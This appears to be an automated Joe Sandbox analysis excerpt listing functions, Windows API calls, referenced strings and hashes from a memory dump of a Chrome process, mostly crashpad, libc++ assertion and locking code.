                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire__aullrem$AddressLibraryLoadProcRelease
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$ProcessPrng$bcryptprimitives.dll
                                                    • API String ID: 1028724378-3360465638
                                                    • Opcode ID: 08d8149fece1ac5e17c4a89b55c08e7a6f93663ec9f1136c8247303ba1d75455
                                                    • Instruction ID: dd40d18dc5a948f6086d5d713700a5e316c479c68dce2b8326c869018b5a8019
                                                    • Opcode Fuzzy Hash: 08d8149fece1ac5e17c4a89b55c08e7a6f93663ec9f1136c8247303ba1d75455
                                                    • Instruction Fuzzy Hash: 3851E771600214AFC714EF29EC85D6B77E9EBC4B10F09852DF959BB291D730AE05C7A2
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,fallback-handler,00000010,?,?), ref: 00D45299
                                                    • GetProcAddress.KERNEL32(00000000,SetUnhandledExceptionFilter), ref: 00D452A9
                                                    Strings
                                                    • SetUnhandledExceptionFilter, xrefs: 00D452A3
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D4537E
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D4510F, 00D4530B
                                                    • type, xrefs: 00D451E4
                                                    • test-child-process, xrefs: 00D451F0, 00D45320, 00D45355
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D45377
                                                    • kernel32.dll, xrefs: 00D45294
                                                    • database, xrefs: 00D45231
                                                    • fallback-handler, xrefs: 00D451DD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$SetUnhandledExceptionFilter$database$fallback-handler$kernel32.dll$test-child-process$type
                                                    • API String ID: 1646373207-4148422498
                                                    • Opcode ID: 6d64ef6510883e1b8174ea6841393160a0bc17685447c8a58271b2f744c7e2de
                                                    • Instruction ID: b16fedac55b8497d6c5cf0fc4a8dd530f7620a0cae8bbd1d64db3da223766bc5
                                                    • Opcode Fuzzy Hash: 6d64ef6510883e1b8174ea6841393160a0bc17685447c8a58271b2f744c7e2de
                                                    • Instruction Fuzzy Hash: 0651E5B0E00748AFDB10DF60EC45BAEBBB5EF55700F05911AF505BB296EBB0A945CB60
                                                    APIs
                                                    • _strlen.LIBCMT ref: 00D33214
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D33361
                                                    • _strlen.LIBCMT ref: 00D333F0
                                                    • _strlen.LIBCMT ref: 00D33519
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D33601
                                                    Strings
                                                    • Other, xrefs: 00D3324B, 00D3364B
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D3366D
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D3365A
                                                    • d, xrefs: 00D335D3
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00D3367C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Other$d
                                                    • API String ID: 3295101305-4285599685
                                                    • Opcode ID: c368f1b4bc0120f2ad68ec91f5d183b1b5eba6e285865c4e219a337a8c264033
                                                    • Instruction ID: f527d9650e7f50b4b3312bfcb0b57e93aa3a9c2ef18170094abb39f2b370b97b
                                                    • Opcode Fuzzy Hash: c368f1b4bc0120f2ad68ec91f5d183b1b5eba6e285865c4e219a337a8c264033
                                                    • Instruction Fuzzy Hash: BED1D4B1A087409FC715DF28C94161FBBE5BFC9710F148A2DF899A7391EB70DA058B92
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,fallback-handler,00000010,?,?), ref: 00D45299
                                                    • GetProcAddress.KERNEL32(00000000,SetUnhandledExceptionFilter), ref: 00D452A9
                                                    Strings
                                                    • SetUnhandledExceptionFilter, xrefs: 00D452A3
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D4510F
                                                    • type, xrefs: 00D451E4
                                                    • test-child-process, xrefs: 00D451F0
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D45108
                                                    • kernel32.dll, xrefs: 00D45294
                                                    • database, xrefs: 00D45231
                                                    • fallback-handler, xrefs: 00D451DD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$SetUnhandledExceptionFilter$database$fallback-handler$kernel32.dll$test-child-process$type
                                                    • API String ID: 1646373207-431789310
                                                    • Opcode ID: 8dfba23d43e0df08a760f91e6e06fa5170268bf6cfdccc375167b90e23ad9fde
                                                    • Instruction ID: 911a9f24b570c3a2fa0f93c08a9604d56dc2df96427819dddb314398bcb9447f
                                                    • Opcode Fuzzy Hash: 8dfba23d43e0df08a760f91e6e06fa5170268bf6cfdccc375167b90e23ad9fde
                                                    • Instruction Fuzzy Hash: 1EB119B1D007099FCB10DF64E8856AEB7F5FF58304F15822AF805BB256EB70A944CBA1
                                                    APIs
                                                    • _strlen.LIBCMT ref: 00DB75FF
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,7FFFFFF7,?,7FFFFFF7,?,00DF1938,Histogram.MismatchedConstructionArguments,00000000,00ED1384,..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length), ref: 00DB773F
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,7FFFFFF7,?,7FFFFFF7,?,00DF1938,Histogram.MismatchedConstructionArguments,00000000,00ED1384,..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length), ref: 00DB7762
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,7FFFFFF7,?,7FFFFFF7,?,00DF1938,Histogram.MismatchedConstructionArguments,00000000,00ED1384,..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length), ref: 00DB7855
                                                    • ReleaseSRWLockExclusive.KERNEL32(7FFFFFF7,?,7FFFFFF7,?,7FFFFFF7,?,00DF1938,Histogram.MismatchedConstructionArguments,00000000,00ED1384,..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length), ref: 00DB78D4
                                                    Strings
                                                    • T, xrefs: 00DB787B
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00DB78A0
                                                    • ..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00DB7892
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00DB788B
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00DB7899
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease$_strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$T
                                                    • API String ID: 1657474455-717127664
                                                    • Opcode ID: 6fcefdc7dd49f569f7e9d25bd50019389004be2a9f9ec3a26dc48b6dd45efa57
                                                    • Instruction ID: 64bf2d5ac3113197a41b9b2b7648793446f1fcf29fa1da3c6d7630a51441ff7a
                                                    • Opcode Fuzzy Hash: 6fcefdc7dd49f569f7e9d25bd50019389004be2a9f9ec3a26dc48b6dd45efa57
                                                    • Instruction Fuzzy Hash: 5181D075E04355DFDB00DB609885AEE7BB5AF88704F180029E807BB252EB31ED04CAB1
                                                    APIs
                                                    • UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491D1
                                                    • UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491D9
                                                    • UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491E2
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00D48DC9), ref: 00D49200
                                                    • CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D4922E
                                                    • CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D49258
                                                    • CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D49282
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$UnregisterWait
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc$CloseHandle$Free
                                                    • API String ID: 1214919099-1704384866
                                                    • Opcode ID: 63972a0a53086f1abfe04a912e237963d98776b77e1fae0ce643d724a81ede6a
                                                    • Instruction ID: 2f64d6dbfc2d1ab96520f867fa6dfbce1671d3bd0643eb3e9995e7771d3fe4d5
                                                    • Opcode Fuzzy Hash: 63972a0a53086f1abfe04a912e237963d98776b77e1fae0ce643d724a81ede6a
                                                    • Instruction Fuzzy Hash: 17412571A403486BD720AB739C99E6BB6E9AF84700F4C180CF54677692DBB1E948C771
                                                    APIs
                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00D74F82
                                                    • GetUserDefaultLangID.KERNEL32(00000000,\VarFileInfo\Translation,?,?), ref: 00D74FAE
                                                    • GetUserDefaultLangID.KERNEL32 ref: 00D74FB7
                                                    • VerQueryValueW.VERSION(?,?,?,?), ref: 00D75023
                                                    • VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D750A2
                                                    • VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7511E
                                                    • VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D75199
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$DefaultLangUser
                                                    • String ID: \StringFileInfo\%04hx%04hx\%ls$\VarFileInfo\Translation
                                                    • API String ID: 2923350452-4158013653
                                                    • Opcode ID: f2889acaf04c230c95e20aa131e9333e50c925dee1af252930b52ba114e70cdb
                                                    • Instruction ID: 389b9409c0a93b80b164d3924bc51571eae83f4d4a8bb899e6c73047a783b815
                                                    • Opcode Fuzzy Hash: f2889acaf04c230c95e20aa131e9333e50c925dee1af252930b52ba114e70cdb
                                                    • Instruction Fuzzy Hash: 8E71BAB19412286FDB219F60DC89FEAB7B8EF15300F0441D9F908A7252F7759E858F61
                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 00D74007
                                                    • DisconnectNamedPipe.KERNEL32(?), ref: 00D7401C
                                                    • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00D74023
                                                    • CloseHandle.KERNEL32(?), ref: 00D7404D
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\win\exception_handler_server.cc, xrefs: 00D740DE
                                                    • Free, xrefs: 00D74089
                                                    • CloseHandle, xrefs: 00D740A6
                                                    • ConnectNamedPipe, xrefs: 00D740EA
                                                    • ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc, xrefs: 00D74084
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: NamedPipe$CloseConnectDisconnectErrorHandleLast
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\exception_handler_server.cc$..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc$CloseHandle$ConnectNamedPipe$Free
                                                    • API String ID: 447347179-3091828373
                                                    • Opcode ID: 85d2999991920c39b7cf374060a0c40961f1af2df96e5492083c56eaa10ec28a
                                                    • Instruction ID: 8e17fb6427c72304651801cb3003e1d82a1e9b9649fa52fbd3e16d2fe95cc950
                                                    • Opcode Fuzzy Hash: 85d2999991920c39b7cf374060a0c40961f1af2df96e5492083c56eaa10ec28a
                                                    • Instruction Fuzzy Hash: B951C771A003049BD721AB25AC46B7BB3A59F81354F18C429FA4EA7281FB71ED0597B2
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(00000000,?), ref: 00D82683
                                                    • GetLastError.KERNEL32 ref: 00D8268E
                                                    • DeleteFileW.KERNEL32(00000000), ref: 00D826D7
                                                    • RemoveDirectoryW.KERNEL32(00000000), ref: 00D826E4
                                                    • SetLastError.KERNEL32(000000A1), ref: 00D8270C
                                                    • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00D827B6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesErrorLast$DeleteDirectoryRemove
                                                    • String ID: ..\..\base\files\file_util_win.cc$DoDeleteFile$ScopedBlockingCall
                                                    • API String ID: 3447957730-1263771705
                                                    • Opcode ID: 94ca9ed2cba0da5b93fe173318ddb7c6ee94b7ccb4b3aefcdaded36af4b2dd1d
                                                    • Instruction ID: 6e71ca351d8576d821356d82bad263964fec50e7d4c1a59e48f07dcdcde254e2
                                                    • Opcode Fuzzy Hash: 94ca9ed2cba0da5b93fe173318ddb7c6ee94b7ccb4b3aefcdaded36af4b2dd1d
                                                    • Instruction Fuzzy Hash: E9613871A003508FCB11BF24DC8267B77D4AF95710F18862DF8D5A7291EB74EE4887A2
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D402A5
                                                    • WakeAllConditionVariable.KERNEL32(?,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D402B7
                                                    • ReleaseSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D402BE
                                                    • TryAcquireSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D402C5
                                                    • ReleaseSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D402EF
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D40336
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D4034D
                                                    • AcquireSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D40359
                                                    • AcquireSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D40365
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D40421
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release$ConditionVariableWake
                                                    • String ID:
                                                    • API String ID: 2824607059-0
                                                    • Opcode ID: 8ff3c6556a99755ec9d7f00817abb748b656d7c8eee39101eeda8580bc601a12
                                                    • Instruction ID: 690ddcac13daf443ccdcdea054fb8955e9ed478973eb799f4b74111d84387792
                                                    • Opcode Fuzzy Hash: 8ff3c6556a99755ec9d7f00817abb748b656d7c8eee39101eeda8580bc601a12
                                                    • Instruction Fuzzy Hash: 7861A071A002198FCB25DF54C8C957EBBB5FF88310B18052DEB5AAB251D734AD42CBB1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
